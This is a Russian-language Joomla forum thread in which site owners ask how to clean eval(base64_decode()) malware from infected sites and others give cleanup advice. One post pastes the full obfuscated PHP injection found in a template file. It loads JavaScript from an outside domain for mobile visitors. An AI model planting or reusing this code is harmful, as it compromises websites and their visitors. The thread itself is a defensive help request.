Новости Joomla

Вышли релизы безопасности Joomla 6.1.1 и Joomla 5.4.6

Релиз безопасности Joomla 6.1.1 и Joomla 5.4.6

Проект Joomla! рад сообщить о выходе Joomla 6.1.1 и Joomla 5.4.6. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

👩‍💻 JoomShopping: Самый полный курс по созданию интернет-магазина на CMS Joomla.

👩‍💻 JoomShopping: Самый полный курс по созданию интернет-магазина на CMS Joomla.

В открытый доступ выложен видео-курс Дмитрия Гончарова по созданию интернет-магазина на связке Joomla + JoomShopping. Видеоуроки содержат пошаговые инструкции от регистрации хостинга до особенностей вёрстки, настройки способов оплаты и доставки.

В видео фигурирует JoomShopping 4 и Joomla 3, однако JoomShopping довольно консервативный компонент и многие способы и подходы в нём не менялись годами, поэтому данные видео могут быть по прежнему полезны.

Смотреть видео-курс

@joomlafeed

👩‍💻 SM WT CDEK аддон доставки для JoomShopping.

👩‍💻 SM WT CDEK аддон доставки для JoomShopping.

Способ доставки для интернет-магазина JoomShopping. Работает с API CDEK v.2. Считает стоимость доставки, позволяет выбрать пункт выдачи заказа CDEK на карте, отображает полную информацию о ПВЗ в заказе. Для работы аддона необходимо установить и настроить библиотеку WT CDEK.

👉 v.1.3.4. Что нового?
- Скидки на доставку. Добавлены настройки скидок на доставку в зависимости от суммы заказа. Также можно выбрать какую цену использовать: до применения купона или после.
- Фиксированная наценка. Добавлено поле для фиксированной наценки на доставку в интерфейс цены на доставку.
- Локализация. Сделаны файлы локализации. Русский и английский языки.
- Рефакторинг и чистка кода. Приблизили код к стандартам.

Страница расширения

@joomlafeed

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 13 Ответов
  • 10044 Просмотров
*

wake

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Код eval(base64_decode(
« : 24.11.2012, 17:51:06 »
Здравствуйте уважаемые!
В один нехороший день я обнаружил, что 5 сайтов на одном из хостингов не работают. по адресу появляется белый экран и никаких ошибок. в админку не пускает. Почитав форумы, я проверил сайт скриптом ai-bolit, который показал мне наличие вредоносного кода eval(base64_decode( )); в файлах сайтах в огромном количестве.
Почитав по теме этого кода наткнулся на  скрип replace, который позволяет заменить код, но загружая его на сайт, выдается ошибка "Доступ запрещен". Пароль пробовал прописывать и по инструкции и в самом replace.php, но ничего не вышло.
Далее я скачал все сайты на локальный компьютер и принялся заменять код с помощью Notepad++, но данная операция режет мне код во всех файлах, что вызывает полную неработоспособность. после этого я вот написал на форуме. может объяснит как дальше быть.Заранее спасибо ^-^
Записан
*

wfedin

  • Завсегдатай
  • 1273
  • 102 / 0
Re: Код eval(base64_decode(
« Ответ #1 : 24.11.2012, 18:33:46 »
ну во первых скачать свою версию джумла и распаковать с заменой, так-же можно с расширениями, а остатки чистим.
Записан
*

wfedin

  • Завсегдатай
  • 1273
  • 102 / 0
Re: Код eval(base64_decode(
« Ответ #2 : 24.11.2012, 18:38:35 »
так-то я балдею, когда люди бекапы научатся хранить…
Записан
*

wake

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: Код eval(base64_decode(
« Ответ #3 : 24.11.2012, 19:01:22 »
бекап только 1 сохранился) это мне уроком будет)
Записан
*

wake

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: Код eval(base64_decode(
« Ответ #4 : 24.11.2012, 19:02:43 »
почему Notepad++ режет файлы и скрипт replace не работает....
Записан
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Re: Код eval(base64_decode(
« Ответ #5 : 24.11.2012, 20:02:32 »
Цитата: wake от 24.11.2012, 19:02:43
почему Notepad++ режет файлы и скрипт replace не работает....
скрипт replace запускается следующим образом http://ВАШ_САЙТ/replace.php?pas=joomla, если не запускается так, то проверьте права на файл replace.php
но удалять код нужно после того как найдете причину попадания его в файлы, иначе на следующий день этот код опять будет на своем месте
« Последнее редактирование: 24.11.2012, 20:05:48 от icom »
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Код eval(base64_decode(
« Ответ #6 : 25.11.2012, 10:35:04 »
И проверь .htaccess
Записан
*

wake

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: Код eval(base64_decode(
« Ответ #7 : 25.11.2012, 17:34:58 »
а что там надо проверять поскажите !
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Код eval(base64_decode(
« Ответ #8 : 25.11.2012, 18:45:57 »
Цитата: wake от 25.11.2012, 17:34:58
а что там надо проверять поскажите !
Ну если задаете такой вопрос, то лучше замените на стандартный Joomla.
Записан
*

Geks

  • Осваиваюсь на форуме
  • 35
  • 1 / 0
Re: Код eval(base64_decode(
« Ответ #9 : 26.11.2012, 16:11:59 »
Здравствуйте форумчане,
У меня возникла похожая проблема:
В файле index.php шаблона нашел левый код:
Код
<?php
$_ = strrev('tressa'); @$_("e\166\141\154\050b\141\163\145\066\064\137\144\145\143\157\144\145\050'aWYgKChwcmVnX21hdGNoKCcvdGV4dFwvdm5kLndhcC53bWx8YXBwbGljYXRpb25cL3ZuZC53YXAueGh0bWxcK3htbC9zaScsIEAkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkgfHwgcHJlZ19tYXRjaCgnL2FsY2F0ZWx8YW1vaXxhbmRyb2lkfGF2YW50Z298YmxhY2tiZXJyeXxiZW5xfGNlbGx8Y3JpY2tldHxkb2NvbW98ZWxhaW5lfGh0Y3xpZW1vYmlsZXxpcGhvbmV8aXBhZHxpcGFxfGlwb2R8ajJtZXxqYXZhfG9wZXJhLm1pbml8bWlkcHxtbXB8bW9iaXxtb3Rvcm9sYXxuZWMtfG5va2lhfHBhbG18cGFuYXNvbmljfHBoaWxpcHN8cGhvbmV8c2FnZW18c2hhcnB8c2llLXxzbWFydHBob25lfHNvbnl8c3ltYmlhbnx0LW1vYmlsZXx0ZWx1c3x1cFwuYnJvd3Nlcnx1cFwubGlua3x2b2RhZm9uZXx3YXB8d2Vib3N8d2lyZWxlc3N8eGRhfHhvb218enRlL3NpJywgQCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgcHJlZ19tYXRjaCgnL21zZWFyY2h8bVw/cT0vc2knLCBAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkgJiYgIXByZWdfbWF0Y2goJy9tYWNpbnRvc2h8YW1lcmljYXxhdmFudHxkb3dubG9hZHx3aW5kb3dzXC1tZWRpYVwtcGxheWVyfHlhbmRleHxnb29nbGUvc2knLCBAJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgeyBlY2hvICc8c2NyaXB0IHNyYz0iaHR0cDovL21vYmlsZS1jb250ZW50LmluZm8vanF1ZXJ5LTEuNy4xLmpzIj48L3NjcmlwdD4nOyBmbHVzaCgpOyBleGl0OyB9'\051\051\073");
?>
Удалил его, но через несколько дней опять тоже самое.
Подскажите где лазейка.
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Код eval(base64_decode(
« Ответ #10 : 26.11.2012, 16:50:28 »
Цитировать
Подскажите где лазейка.
у вас на хостинге в любом из файлов
Записан
*

Geks

  • Осваиваюсь на форуме
  • 35
  • 1 / 0
Re: Код eval(base64_decode(
« Ответ #11 : 26.11.2012, 16:56:35 »
Обновить Joomla?
Что еще можно сделать?
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Код eval(base64_decode(
« Ответ #12 : 26.11.2012, 19:05:21 »
Цитата: Geks от 26.11.2012, 16:56:35
Что еще можно сделать?
Сканер в помощь http://joomlaforum.ru/index.php/topic,198048.0.html
Записан
*

wake

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Re: Код eval(base64_decode(
« Ответ #13 : 27.11.2012, 14:46:23 »
благодарю всех отписавшихся. Удалил код скриптом replace, заново кинул Joomla и восстановил битые файл модулей, плагинов. Один сайт работоспособен уже. Возник вопрос. Как закрыть уязвимость сайта, чтобы впредь такого не повторялось? Надеюсь на ваши рекомендации
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Модификация "eval( base64_decode ())"

Автор nicebit

 Ответов: 10
Просмотров: 3449 		Последний ответ 24.11.2015, 13:24:39
от winstrool
Вирус на Joomla - скрипт: eval (unescape..

Автор allmomente

 Ответов: 9
Просмотров: 6391 		Последний ответ 19.08.2009, 20:18:33
от one_more